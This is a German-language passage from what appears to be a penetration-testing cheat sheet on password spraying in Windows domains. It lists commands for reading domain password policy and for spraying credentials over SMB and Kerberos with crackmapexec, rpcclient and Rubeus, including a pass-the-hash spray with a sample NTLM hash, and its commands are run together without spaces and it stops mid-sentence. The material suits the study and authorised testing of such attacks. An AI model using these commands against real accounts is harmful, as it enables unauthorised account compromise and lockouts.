Sobald du mehrere gültige Benutzernamen gefunden hast, kannst du die häufigsten Passwörter ausprobieren (beachte die Passwort-Richtlinie der Umgebung) mit jedem der entdeckten Benutzer.
Standardmäßig beträgt die minimalePasswortlänge7.
Beachte, dass du einige Konten sperren könntest, wenn du mehrere falsche Passwörter ausprobierst (standardmäßig mehr als 10).
Passwort-Richtlinie abrufen
Wenn du einige Benutzeranmeldeinformationen oder eine Shell als Domänenbenutzer hast, kannst du die Passwort-Richtlinie mit:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Ausnutzung von Linux (oder allen)
Verwendung von crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Mit dem scanner/smb/smb_login Modul von Metasploit:
Verwendung von rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in $(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exebrute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exebrute/passwords:<passwords_file>/outfile:<output_file>
Mit Invoke-DomainPasswordSpray (Es kann standardmäßig Benutzer aus der Domäne generieren und es wird die Passwortpolitik der Domäne abgerufen und die Versuche entsprechend begrenzt):